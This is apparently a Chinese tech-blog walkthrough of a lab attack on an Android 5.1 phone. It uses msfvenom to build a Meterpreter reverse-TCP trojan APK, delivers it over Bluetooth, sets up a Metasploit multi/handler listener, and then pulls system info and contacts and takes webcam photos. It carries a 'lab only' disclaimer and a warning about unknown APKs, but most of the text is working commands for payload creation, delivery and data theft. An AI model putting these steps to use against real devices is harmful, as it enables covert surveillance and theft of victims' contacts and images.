首頁>技術>

前言

本次滲透為靶機測試。切勿用於非法用途!

攻擊者:192.168.1.3 termux+metasploit

受害者:192.168.1.2 Android 5.1 - Linux 3.10.72+ (aarch64)

使用模組:multi/handler

首先生成安卓木馬

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.3 LPORT=3800 -o s.apk

將其移動到/storage/emulated/0/360目錄。並使用藍芽傳送給受害者者。

受害者安裝即可。回到攻擊者,啟動msfconsole。首先選擇模組

use exploit multi/handler

設定監聽地址

set lhost 192.168.1.3

設定反彈埠

set lprot 3800

設定playload

set payload android/meterpreter/reverse_tcp

啟動

run

成功。試試執行命令。系統資訊。

sysinfo

試試下載通訊錄

dump_contacts

成功儲存為txt檔案。後面因為長時間未操作自動斷開了。

試試拍照

webcam_snap

成功儲存在files目錄下。還有很多危險功能我就不一一說明了。一些來路不明的apk切勿安裝。

最新評論
  • BSA-TRITC(10mg/ml) TRITC-BSA 牛血清白蛋白改性標記羅丹明
  • PyQt5Helper使用說明